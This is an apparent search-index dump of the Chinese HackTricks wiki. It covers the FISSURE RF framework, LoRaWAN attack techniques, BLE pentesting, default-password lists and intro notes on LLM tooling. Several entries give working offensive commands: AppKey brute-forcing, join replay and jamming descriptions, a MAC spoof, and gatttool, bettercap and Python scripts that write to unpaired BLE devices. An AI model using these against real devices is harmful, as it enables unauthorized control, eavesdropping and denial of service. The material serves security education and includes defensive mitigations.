通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。 频率独立的基于SDR的信号理解和逆向工程 FISSURE是一个开源的RF和逆向工程框架,旨在适合所有技能水平,具有信号检测和分类、协议发现、攻击执行、IQ操控、漏洞分析、自动化和AI/ML的钩子。该框架旨在促进软件模块、无线电、协议、信号数据、脚本、流程图、参考材料和第三方工具的快速集成。FISSURE是一个工作流启用器,将软件集中在一个位置,使团队能够轻松跟上进度,同时共享特定Linux发行版的相同经过验证的基线配置。 FISSURE包含的框架和工具旨在检测RF能量的存在,理解信号的特性,收集和分析样本,开发传输和/或注入技术,并制作自定义有效载荷或消息。FISSURE包含一个不断增长的协议和信号信息库,以协助识别、数据包制作和模糊测试。在线档案功能可以下载信号文件并构建播放列表以模拟流量和测试系统。 友好的Python代码库和用户界面使初学者能够快速了解涉及RF和逆向工程的流行工具和技术。网络安全和工程领域的教育工作者可以利用内置材料或利用该框架展示他们自己的实际应用。开发人员和研究人员可以将FISSURE用于日常任务或向更广泛的受众展示他们的前沿解决方案。随着FISSURE在社区中的认知和使用的增长,其能力和所涵盖技术的广度也将随之增加。 附加信息 AIS Page GRCon22 Slides GRCon22 Paper GRCon22 Video Hack Chat Transcript","breadcrumbs":"Radio Hacking » FISSURE - The RF Framework » FISSURE - The RF Framework","id":"10421","title":"FISSURE - The RF Framework"},"10422":{"body":"支持的 FISSURE中有三个分支,以便于文件导航并减少代码冗余。Python2_maint-3.7分支包含围绕Python2、PyQt4和GNU Radio 3.7构建的代码库;Python3_maint-3.8分支围绕Python3、PyQt5和GNU Radio 3.8构建;Python3_maint-3.10分支围绕Python3、PyQt5和GNU Radio 3.10构建。 操作系统 FISSURE分支 Ubuntu 18.04 (x64) Python2_maint-3.7 Ubuntu 18.04.5 (x64) Python2_maint-3.7 Ubuntu 18.04.6 (x64) Python2_maint-3.7 Ubuntu 20.04.1 (x64) Python3_maint-3.8 Ubuntu 20.04.4 (x64) Python3_maint-3.8 KDE neon 5.25 (x64) Python3_maint-3.8 进行中(测试版) 这些操作系统仍处于测试状态。它们正在开发中,已知缺少多个功能。安装程序中的项目可能与现有程序冲突或在状态被移除之前无法安装。 操作系统 FISSURE分支 DragonOS Focal (x86_64) Python3_maint-3.8 Ubuntu 22.04 (x64) Python3_maint-3.10 注意:某些软件工具并不适用于每个操作系统。请参阅 Software And Conflicts 安装 git clone https://github.com/ainfosec/FISSURE.git\\ncd FISSURE\\ngit checkout or or \\ngit submodule update --init\\n./install 这将安装启动安装 GUI 所需的 PyQt 软件依赖项(如果未找到)。 接下来,选择最符合您操作系统的选项(如果您的操作系统与选项匹配,则应自动检测)。 Python2_maint-3.7 Python3_maint-3.8 Python3_maint-3.10 install1b install1a install1c 建议在干净的操作系统上安装 FISSURE,以避免现有的冲突。选择所有推荐的复选框(默认按钮),以避免在操作 FISSURE 内的各种工具时出现错误。安装过程中会有多个提示,主要询问提升权限和用户名。如果某个项目在末尾包含“验证”部分,安装程序将运行后面的命令,并根据命令是否产生错误将复选框项目高亮显示为绿色或红色。没有“验证”部分的已选项目在安装后将保持黑色。 install2 使用方法 打开终端并输入: fissure 
参考FISSURE帮助菜单以获取更多使用细节。","breadcrumbs":"Radio Hacking » FISSURE - The RF Framework » 开始使用","id":"10422","title":"开始使用"},"10423":{"body":"组件 仪表板 中心枢纽 (HIPRFISR) 目标信号识别 (TSI) 协议发现 (PD) 流图与脚本执行器 (FGE) components 功能 信号检测器 IQ操控 信号查找 模式识别 攻击 模糊测试 信号播放列表 图像库 数据包构造 Scapy集成 CRC计算器 日志记录 硬件 以下是具有不同集成级别的“支持”硬件列表: USRP: X3xx, B2xx, B20xmini, USRP2, N2xx HackRF RTL2832U 802.11适配器 LimeSDR bladeRF, bladeRF 2.0 micro Open Sniffer PlutoSDR","breadcrumbs":"Radio Hacking » FISSURE - The RF Framework » 详细信息","id":"10423","title":"详细信息"},"10424":{"body":"FISSURE附带了几本有用的指南,以帮助熟悉不同的技术和技巧。许多指南包括使用集成到FISSURE中的各种工具的步骤。 Lesson1: OpenBTS Lesson2: Lua Dissectors Lesson3: Sound eXchange Lesson4: ESP Boards Lesson5: Radiosonde Tracking Lesson6: RFID Lesson7: Data Types Lesson8: Custom GNU Radio Blocks Lesson9: TPMS Lesson10: Ham Radio Exams Lesson11: Wi-Fi Tools","breadcrumbs":"Radio Hacking » FISSURE - The RF Framework » 课程","id":"10424","title":"课程"},"10425":{"body":"添加更多硬件类型、RF协议、信号参数、分析工具 支持更多操作系统 开发围绕FISSURE的课程材料(RF攻击、Wi-Fi、GNU Radio、PyQt等) 创建信号调节器、特征提取器和信号分类器,支持可选择的AI/ML技术 实现递归解调机制,以从未知信号生成比特流 将主要FISSURE组件过渡到通用传感器节点部署方案","breadcrumbs":"Radio Hacking » FISSURE - The RF Framework » 路线图","id":"10425","title":"路线图"},"10426":{"body":"强烈鼓励对FISSURE的改进建议。如果您对以下内容有任何想法,请在 讨论 页面或Discord服务器上留言: 新功能建议和设计变更 带有安装步骤的软件工具 新课程或现有课程的附加材料 感兴趣的RF协议 更多硬件和SDR类型以供集成 Python中的IQ分析脚本 安装修正和改进 对FISSURE的贡献对于加速其开发至关重要。您所做的任何贡献都将受到高度赞赏。如果您希望通过代码开发进行贡献,请先fork该仓库并创建一个pull request: Fork项目 创建您的功能分支(git checkout -b feature/AmazingFeature) 提交您的更改(git commit -m \'Add some AmazingFeature\') 推送到分支(git push origin feature/AmazingFeature) 打开一个pull request 创建 问题 以引起对错误的关注也是受欢迎的。","breadcrumbs":"Radio Hacking » FISSURE - The RF Framework » 贡献","id":"10426","title":"贡献"},"10427":{"body":"联系Assured Information Security, Inc. 
(AIS)商业发展部门,提出并正式化任何FISSURE合作机会——无论是通过投入时间集成您的软件,还是让AIS的优秀人才为您的技术挑战开发解决方案,或将FISSURE集成到其他平台/应用程序中。","breadcrumbs":"Radio Hacking » FISSURE - The RF Framework » 合作","id":"10427","title":"合作"},"10428":{"body":"GPL-3.0 有关许可证的详细信息,请参见LICENSE文件。","breadcrumbs":"Radio Hacking » FISSURE - The RF Framework » 许可证","id":"10428","title":"许可证"},"10429":{"body":"加入Discord服务器: https://discord.gg/JZDs5sgxcG 在Twitter上关注: @FissureRF , @AinfoSec Chris Poore - Assured Information Security, Inc. - poorec@ainfosec.com 商业发展 - Assured Information Security, Inc. - bd@ainfosec.com","breadcrumbs":"Radio Hacking » FISSURE - The RF Framework » 联系","id":"10429","title":"联系"},"1043":{"body":"BleepingComputer – WinRAR 零日漏洞被利用在归档提取中植入恶意软件 WinRAR 7.13 更新日志 Snyk – Zip Slip 漏洞分析 tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Archive Extraction Path Traversal » 参考文献","id":"1043","title":"参考文献"},"10430":{"body":"我们感谢这些开发者: Credits","breadcrumbs":"Radio Hacking » FISSURE - The RF Framework » 贡献者","id":"10430","title":"贡献者"},"10431":{"body":"特别感谢Dr. Samuel Mantravadi和Joseph Reith对本项目的贡献。 tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 
通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Radio Hacking » FISSURE - The RF Framework » 致谢","id":"10431","title":"致谢"},"10432":{"body":"Reading time: 7 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Radio Hacking » Low-Power Wide Area Network » 低功耗广域网","id":"10432","title":"低功耗广域网"},"10433":{"body":"低功耗广域网 (LPWAN) 是一组无线、低功耗、广域网技术,旨在实现 长距离通信 ,并具有低比特率。 它们的通信范围可超过 六英里 ,其 电池 寿命可达 20年 。 长距离 ( LoRa ) 目前是部署最广泛的 LPWAN 物理层,其开放的 MAC 层规范是 LoRaWAN 。","breadcrumbs":"Radio Hacking » Low-Power Wide Area Network » 介绍","id":"10433","title":"介绍"},"10434":{"body":"LoRa – 由 Semtech 开发的啁啾扩频 (CSS) 物理层(专有但有文档)。 LoRaWAN – 由 LoRa-Alliance 维护的开放 MAC/网络层。版本 1.0.x 和 1.1 在实际应用中较为常见。 典型架构: 终端设备 → 网关(数据包转发器) → 网络服务器 → 应用服务器 。 安全模型 依赖于两个 AES-128 根密钥 (AppKey/NwkKey),在 加入 过程中(OTAA)派生会话密钥,或是硬编码(ABP)。如果任何密钥泄露,攻击者将获得对相应流量的完全读/写能力。","breadcrumbs":"Radio Hacking » Low-Power Wide Area Network » LPWAN、LoRa 和 LoRaWAN","id":"10434","title":"LPWAN、LoRa 和 LoRaWAN"},"10435":{"body":"层级 弱点 实际影响 PHY 反应性/选择性干扰 使用单个 SDR 和 <1 W 输出演示 100% 数据包丢失 MAC 加入接受和数据帧重放(随机数重用,ABP 计数器回滚) 设备欺骗、消息注入、拒绝服务 网络服务器 不安全的数据包转发器、弱 MQTT/UDP 过滤器、过时的网关固件 网关上的 RCE → 进入 OT/IT 网络 应用 硬编码或可预测的 AppKeys 暴力破解/解密流量,冒充传感器","breadcrumbs":"Radio Hacking » Low-Power Wide Area Network » 攻击面总结","id":"10435","title":"攻击面总结"},"10436":{"body":"CVE-2024-29862 – ChirpStack gateway-bridge 和 mqtt-forwarder 接受绕过有状态防火墙规则的 TCP 数据包,导致远程管理接口暴露。分别在 4.0.11 / 4.2.1 中修复。 Dragino LG01/LG308 系列 – 多个 2022-2024 CVE(例如 2022-45227 目录遍历,2022-45228 CSRF)在 2025 年仍未修补;在数千个公共网关上启用未经身份验证的固件转储或配置覆盖。 Semtech 数据包转发器 UDP 溢出(未发布的建议,2023-10 修补):构造的上行数据包大于 255 B 触发堆栈溢出 -> 在 SX130x 参考网关上 RCE(由 Black Hat EU 2023 “LoRa Exploitation Reloaded” 
发现)。","breadcrumbs":"Radio Hacking » Low-Power Wide Area Network » 最近的漏洞 (2023-2025)","id":"10436","title":"最近的漏洞 (2023-2025)"},"10437":{"body":"","breadcrumbs":"Radio Hacking » Low-Power Wide Area Network » 实用攻击技术","id":"10437","title":"实用攻击技术"},"10438":{"body":"bash # Capture all channels around 868.3 MHz with an SDR (USRP B205)\\npython3 lorattack/sniffer.py \\\\\\n--freq 868.3e6 --bw 125e3 --rate 1e6 --sf 7 --session smartcity # Bruteforce AppKey from captured OTAA join-request/accept pairs\\npython3 lorapwn/bruteforce_join.py --pcap smartcity.pcap --wordlist top1m.txt","breadcrumbs":"Radio Hacking » Low-Power Wide Area Network » 1. 嗅探和解密流量","id":"10438","title":"1. 嗅探和解密流量"},"10439":{"body":"捕获一个合法的 JoinRequest 。 在原始设备再次传输之前立即重新传输它(或增加 RSSI)。 网络服务器分配一个新的 DevAddr 和会话密钥,而目标设备继续使用旧会话 → 攻击者拥有空闲会话并可以注入伪造的上行链路。","breadcrumbs":"Radio Hacking » Low-Power Wide Area Network » 2. OTAA 加入重放 (DevNonce 重用)","id":"10439","title":"2. OTAA 加入重放 (DevNonce 重用)"},"1044":{"body":"Reading time: 26 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Brute Force - CheatSheet » Brute Force - CheatSheet","id":"1044","title":"Brute Force - CheatSheet"},"10440":{"body":"强制 SF12/125 kHz 以增加空中时间 → 耗尽网关的占空比(拒绝服务),同时对攻击者的电池影响较小(仅发送网络级 MAC 命令)。","breadcrumbs":"Radio Hacking » Low-Power Wide Area Network » 3. 自适应数据速率 (ADR) 降级","id":"10440","title":"3. 自适应数据速率 (ADR) 降级"},"10441":{"body":"运行 GNU Radio 流图的 HackRF One 在检测到前导码时触发宽带啁啾 - 阻塞所有扩频因子,发射功率 ≤200 mW;在 2 公里范围内测量到完全中断。","breadcrumbs":"Radio Hacking » Low-Power Wide Area Network » 4. 反应性干扰","id":"10441","title":"4. 
反应性干扰"},"10442":{"body":"工具 目的 备注 LoRaWAN 审计框架 (LAF) 构造/解析/攻击 LoRaWAN 帧,基于数据库的分析器,暴力破解 Docker 镜像,支持 Semtech UDP 输入 LoRaPWN Trend Micro Python 工具,用于暴力 OTAA,生成下行链路,解密有效载荷 2023 年发布演示,SDR 无关 LoRAttack 多通道嗅探器 + 重放,使用 USRP;导出 PCAP/LoRaTap 良好的 Wireshark 集成 gr-lora / gr-lorawan GNU Radio OOT 块,用于基带 TX/RX 自定义攻击的基础","breadcrumbs":"Radio Hacking » Low-Power Wide Area Network » 攻击工具 (2025)","id":"10442","title":"攻击工具 (2025)"},"10443":{"body":"优先选择具有真正随机 DevNonce 的 OTAA 设备;监控重复项。 强制执行 LoRaWAN 1.1 :32 位帧计数器,独特的 FNwkSIntKey / SNwkSIntKey。 将帧计数器存储在非易失性存储器中 ( ABP ) 或迁移到 OTAA。 部署 安全元件 (ATECC608A/SX1262-TRX-SE) 以保护根密钥免受固件提取。 禁用远程 UDP 数据包转发端口 (1700/1701) 或使用 WireGuard/VPN 限制。 保持网关更新;Kerlink/Dragino 提供 2024 年修补的镜像。 实施 流量异常检测 (例如,LAF 分析器) - 标记计数器重置、重复加入、突然的 ADR 变化。","breadcrumbs":"Radio Hacking » Low-Power Wide Area Network » 防御建议 (渗透测试者检查清单)","id":"10443","title":"防御建议 (渗透测试者检查清单)"},"10444":{"body":"LoRaWAN 审计框架 (LAF) – https://github.com/IOActive/laf Trend Micro LoRaPWN 概述 – https://www.hackster.io/news/trend-micro-finds-lorawan-security-lacking-develops-lorapwn-python-utility-bba60c27d57a tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Radio Hacking » Low-Power Wide Area Network » 参考文献","id":"10444","title":"参考文献"},"10445":{"body":"Reading time: 10 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 
通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Radio Hacking » Pentesting BLE - Bluetooth Low Energy » Pentesting BLE - 蓝牙低功耗","id":"10445","title":"Pentesting BLE - 蓝牙低功耗"},"10446":{"body":"自 Bluetooth 4.0 规范以来,BLE 只使用 40 个信道,覆盖 2400 到 2483.5 MHz 的范围。相比之下,传统 Bluetooth 在相同范围内使用 79 个信道。 BLE 设备通过发送 advertising packets ( beacons )来通信,这些数据包向附近的设备广播该 BLE 设备的存在。这些 beacons 有时也会 发送数据 。 监听设备,也称为 central device,可以对 advertising packet 使用专门发送给该广告设备的 SCAN request 进行响应。对该扫描的 response 使用与 advertising packet 相同的结构,但包含一些无法放入初始 advertising 请求的附加信息,例如完整的设备名称。 前导字节用于同步频率,而四字节的 access address 是一个 connection identifier ,用于多个设备尝试在相同信道上建立连接的场景。接下来,Protocol Data Unit( PDU )包含 advertising data 。PDU 有多种类型;最常用的是 ADV_NONCONN_IND 和 ADV_IND。如果设备 不接受连接 ,则使用 ADV_NONCONN_IND PDU 类型,仅在 advertising packet 中传输数据。如果设备 允许连接 ,则使用 ADV_IND ,并在 connection 建立后停止发送 advertising packets。","breadcrumbs":"Radio Hacking » Pentesting BLE - Bluetooth Low Energy » 介绍","id":"10446","title":"介绍"},"10447":{"body":"Generic Attribute Profile (GATT)定义了 设备应如何格式化和传输数据 。在分析 BLE 设备的攻击面时,你通常会将注意力集中在 GATT(或 GATTs)上,因为它决定了 如何触发设备功能 以及数据如何被存储、分组和修改。GATT 将设备的 characteristics、descriptors 和 services 以 16 位或 32 位值的表格形式列出。 Characteristic 是在 central device 和 peripheral 之间 发送 的 数据 值。这些 characteristics 可以有 descriptors ,用于 提供关于它们的附加信息 。如果为了执行特定操作而相关, characteristics 通常会被 分组 到 services 中。","breadcrumbs":"Radio Hacking » Pentesting BLE - Bluetooth Low Energy » GATT","id":"10447","title":"GATT"},"10448":{"body":"bash hciconfig #Check config, check if UP or DOWN\\n# If DOWN try:\\nsudo modprobe -c bluetooth\\nsudo hciconfig hci0 down && sudo hciconfig hci0 up # Spoof MAC\\nspooftooph -i hci0 -a 11:22:33:44:55:66","breadcrumbs":"Radio Hacking » Pentesting BLE - Bluetooth Low Energy » 枚举","id":"10448","title":"枚举"},"10449":{"body":"GATTool 允许与另一设备 建立 连接 ,列出该设备的 特征 ,并读取和写入其属性。 GATTTool 可以使用 -I 选项启动交互式 shell: bash gatttool -i hci0 -I\\n[ ][LE]> connect 24:62:AB:B1:A8:3E Attempting to connect to A4:CF:12:6C:B3:76 
Connection successful\\n[A4:CF:12:6C:B3:76][LE]> characteristics\\nhandle: 0x0002, char properties: 0x20, char value handle:\\n0x0003, uuid: 00002a05-0000-1000-8000-00805f9b34fb\\nhandle: 0x0015, char properties: 0x02, char value handle:\\n0x0016, uuid: 00002a00-0000-1000-8000-00805f9b34fb\\n[...] # Write data\\ngatttool -i -b --char-write-req -n \\ngatttool -b a4:cf:12:6c:b3:76 --char-write-req -a 0x002e -n $(echo -n \\"04dc54d9053b4307680a\\"|xxd -ps) # Read data\\ngatttool -i -b --char-read -a 0x16 # Read connecting with an authenticated encrypted connection\\ngatttool --sec-level=high -b a4:cf:12:6c:b3:76 --char-read -a 0x002c","breadcrumbs":"Radio Hacking » Pentesting BLE - Bluetooth Low Energy » GATTool","id":"10449","title":"GATTool"},"1045":{"body":"在谷歌中搜索 所使用技术的默认凭据,或 尝试这些链接 : https://github.com/ihebski/DefaultCreds-cheat-sheet http://www.phenoelit.org/dpl/dpl.html http://www.vulnerabilityassessment.co.uk/passwordsC.htm https://192-168-1-1ip.mobi/default-router-passwords-list/ https://datarecovery.com/rd/default-passwords/ https://bizuns.com/default-passwords-list https://github.com/danielmiessler/SecLists/blob/master/Passwords/Default-Credentials/default-passwords.csv https://github.com/Dormidera/WordList-Compendium https://www.cirt.net/passwords http://www.passwordsdatabase.com/ https://many-passwords.github.io/ https://theinfocentric.com/","breadcrumbs":"Brute Force - CheatSheet » 默认凭据","id":"1045","title":"默认凭据"},"10450":{"body":"bash # Start listening for beacons\\nsudo bettercap --eval \\"ble.recon on\\"\\n# Wait some time\\n>> ble.show # Show discovered devices\\n>> ble.enum # This will show the service, characteristics and properties supported # Write data in a characteristic\\n>> ble.write \\n>> ble.write ff06 68656c6c6f # Write \\"hello\\" in ff06","breadcrumbs":"Radio Hacking » Pentesting BLE - Bluetooth Low Energy » Bettercap","id":"10450","title":"Bettercap"},"10451":{"body":"许多低成本的 BLE 外设不会强制执行 pairing/bonding。没有 bonding,Link Layer 
加密永远不会启用,因此 ATT/GATT 流量是明文的。一个 off-path sniffer 可以跟踪连接,解码 GATT 操作以获取 characteristic handles and values,任何附近的主机随后可以连接并重放那些 writes 来控制设备。","breadcrumbs":"Radio Hacking » Pentesting BLE - Bluetooth Low Energy » Sniffing and actively controlling unpaired BLE devices","id":"10451","title":"Sniffing and actively controlling unpaired BLE devices"},"10452":{"body":"硬件:一块 Sonoff Zigbee 3.0 USB Dongle Plus (CC26x2/CC1352),刷写了 NCC Group 的 Sniffle 固件。 Install Sniffle and its Wireshark extcap on Linux: bash if [ ! -d /opt/sniffle/Sniffle-1.10.0/python_cli ]; then\\necho \\"[+] - Sniffle not installed! Installing at 1.10.0...\\"\\nsudo mkdir -p /opt/sniffle\\nsudo chown -R $USER:$USER /opt/sniffle\\npushd /opt/sniffle\\nwget https://github.com/nccgroup/Sniffle/archive/refs/tags/v1.10.0.tar.gz\\ntar xvf v1.10.0.tar.gz\\n# Install Wireshark extcap for user and root only\\nmkdir -p $HOME/.local/lib/wireshark/extcap\\nln -s /opt/sniffle/Sniffle-1.10.0/python_cli/sniffle_extcap.py $HOME/.local/lib/wireshark/extcap\\nsudo mkdir -p /root/.local/lib/wireshark/extcap\\nsudo ln -s /opt/sniffle/Sniffle-1.10.0/python_cli/sniffle_extcap.py /root/.local/lib/wireshark/extcap\\npopd\\nelse\\necho \\"[+] - Sniffle already installed at 1.10.0\\"\\nfi 将 Sonoff 刷入 Sniffle 固件(确保你的串口设备匹配,例如 /dev/ttyUSB0): bash pushd /opt/sniffle/\\nwget https://github.com/nccgroup/Sniffle/releases/download/v1.10.0/sniffle_cc1352p1_cc2652p1_1M.hex\\ngit clone https://github.com/sultanqasim/cc2538-bsl.git\\ncd cc2538-bsl\\npython3 -m venv .venv\\nsource .venv/bin/activate\\npython3 -m pip install pyserial intelhex\\npython3 cc2538-bsl.py -p /dev/ttyUSB0 --bootloader-sonoff-usb -ewv ../sniffle_cc1352p1_cc2652p1_1M.hex\\ndeactivate\\npopd 通过 Wireshark 的 Sniffle extcap 捕获,并通过过滤快速 pivot 到会改变状态的写入: text _ws.col.info contains \\"Sent Write Command\\" 这突出显示了 ATT Write Commands 来自客户端;handle and value 通常直接映射到设备动作(例如,向 buzzer/alert characteristic 写入 0x01,写入 0x00 停止)。 Sniffle CLI 快速示例: bash python3 scanner.py --output 
scan.pcap\\n# Only devices with very strong signal\\npython3 scanner.py --rssi -40\\n# Filter advertisements containing a string\\npython3 sniffer.py --string \\"banana\\" --output sniff.pcap Alternative sniffer: Nordic’s nRF Sniffer for BLE + Wireshark plugin 也可用。在小型/廉价的 Nordic dongles 上,你通常会覆盖 USB bootloader 以加载 sniffer firmware,因此你要么保留一个专用的 sniffer dongle,要么需要使用 J-Link/JTAG 在之后恢复 bootloader。","breadcrumbs":"Radio Hacking » Pentesting BLE - Bluetooth Low Energy » Sniffing with Sniffle (CC26x2/CC1352)","id":"10452","title":"Sniffing with Sniffle (CC26x2/CC1352)"},"10453":{"body":"一旦你从 sniffed traffic 中识别出可写的 characteristic handle 和对应的 value,就以任意 central 身份连接并发出相同的 write: With Nordic nRF Connect for Desktop (BLE app): 选择 nRF52/nRF52840 dongle,扫描并连接到目标。 浏览 GATT database,定位目标 characteristic(通常有友好名称,例如 Alert Level)。 使用 sniffed bytes 执行 Write(例如,01 触发,00 停止)。 Automate on Windows with a Nordic dongle using Python + blatann: python import time\\nimport blatann # CONFIG\\nCOM_PORT = \\"COM29\\" # Replace with your COM port\\nTARGET_MAC = \\"5B:B1:7F:47:A7:00\\" # Replace with your target MAC target_address = blatann.peer.PeerAddress.from_string(TARGET_MAC + \\",p\\") # CONNECT\\nble_device = blatann.BleDevice(COM_PORT)\\nble_device.configure()\\nble_device.open()\\nprint(f\\"[-] Connecting to {TARGET_MAC}...\\")\\npeer = ble_device.connect(target_address).wait()\\nif not peer:\\nprint(\\"[!] Connection failed.\\")\\nble_device.close()\\nraise SystemExit(1) print(\\"Connected. Discovering services...\\")\\npeer.discover_services().wait(5, exception_on_timeout=False) # Example: write 0x01/0x00 to a known handle\\nfor service in peer.database.services:\\nfor ch in service.characteristics:\\nif ch.handle == 0x000b: # Replace with your handle\\nprint(\\"[!] 
Beeping.\\")\\nch.write(b\\"\\\\x01\\")\\ntime.sleep(2)\\nprint(\\"[+] And relax.\\")\\nch.write(b\\"\\\\x00\\") print(\\"[-] Disconnecting...\\")\\npeer.disconnect()\\npeer.wait_for_disconnect()\\nble_device.close()","breadcrumbs":"Radio Hacking » Pentesting BLE - Bluetooth Low Energy » Active control via GATT","id":"10453","title":"Active control via GATT"},"10454":{"body":"优先在 Linux 上使用 Sonoff+Sniffle,以实现稳健的信道跳变和连接跟踪。保留一个备用的 Nordic sniffer 作为后备。 如果没有 pairing/bonding,任何附近的攻击者都可以观察到写操作并重放/构造自己的写入到未认证的可写特征。 缓解措施:要求 pairing/bonding 并强制加密;将特征权限设置为需要经过认证的写入;尽量减少未认证的可写特征;使用 Sniffle/nRF Connect 验证 GATT ACLs。","breadcrumbs":"Radio Hacking » Pentesting BLE - Bluetooth Low Energy » 运行注意事项和缓解措施","id":"10454","title":"运行注意事项和缓解措施"},"10455":{"body":"Start hacking Bluetooth Low Energy today! (part 2) – Pentest Partners Sniffle – A sniffer for Bluetooth 5 and 4.x LE Firmware installation for Sonoff USB Dongle (Sniffle README) Sonoff Zigbee 3.0 USB Dongle Plus (ZBDongle-P) Nordic nRF Sniffer for Bluetooth LE nRF Connect for Desktop blatann – Python BLE library for Nordic devices tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Radio Hacking » Pentesting BLE - Bluetooth Low Energy » References","id":"10455","title":"References"},"10456":{"body":"Reading time: 6 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 
通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Test LLMs » 测试 LLMs","id":"10456","title":"测试 LLMs"},"10457":{"body":"","breadcrumbs":"Test LLMs » 本地运行和训练模型","id":"10457","title":"本地运行和训练模型"},"10458":{"body":"Hugging Face Transformers 是使用、训练和部署 LLM(如 GPT、BERT 等)最流行的开源库之一。它提供了一个全面的生态系统,包括预训练模型、数据集,以及与 Hugging Face Hub 的无缝集成,以便进行微调和部署。","breadcrumbs":"Test LLMs » Hugging Face Transformers","id":"10458","title":"Hugging Face Transformers"},"10459":{"body":"LangChain 是一个旨在构建 LLM 应用程序的框架。它允许开发人员将语言模型与外部数据源、API 和数据库连接。LangChain 提供了用于高级提示工程、管理对话历史和将 LLM 集成到复杂工作流中的工具。","breadcrumbs":"Test LLMs » LangChain","id":"10459","title":"LangChain"},"1046":{"body":"尽可能多地收集目标的信息并生成自定义字典。可能有帮助的工具:","breadcrumbs":"Brute Force - CheatSheet » 创建你自己的字典","id":"1046","title":"创建你自己的字典"},"10460":{"body":"LitGPT 是由 Lightning AI 开发的一个项目,利用 Lightning 框架来促进基于 GPT 的模型的训练、微调和部署。它与其他 Lightning AI 工具无缝集成,提供优化的工作流程,以处理大规模语言模型,增强性能和可扩展性。","breadcrumbs":"Test LLMs » LitGPT","id":"10460","title":"LitGPT"},"10461":{"body":"描述: LitServe 是 Lightning AI 提供的一个部署工具,旨在快速高效地部署 AI 模型。它通过提供可扩展和优化的服务能力,简化了 LLM 在实时应用中的集成。","breadcrumbs":"Test LLMs » LitServe","id":"10461","title":"LitServe"},"10462":{"body":"Axolotl 是一个基于云的平台,旨在简化 AI 模型(包括 LLM)的部署、扩展和管理。它提供自动扩展、监控和与各种云服务集成等功能,使在生产环境中部署模型变得更加容易,而无需广泛的基础设施管理。","breadcrumbs":"Test LLMs » Axolotl","id":"10462","title":"Axolotl"},"10463":{"body":"","breadcrumbs":"Test LLMs » 在线尝试模型","id":"10463","title":"在线尝试模型"},"10464":{"body":"Hugging Face 是一个领先的机器学习平台和社区,特别以其在自然语言处理(NLP)方面的工作而闻名。它提供工具、库和资源,使开发、共享和部署机器学习模型变得更加容易。 它提供几个部分,如: 模型 :一个庞大的 预训练机器学习模型 库,用户可以浏览、下载和集成用于文本生成、翻译、图像识别等各种任务的模型。 数据集: 一个全面的 数据集集合 ,用于训练和评估模型。它便于访问多样的数据源,使用户能够找到并利用数据以满足其特定的机器学习项目。 空间: 一个用于托管和共享 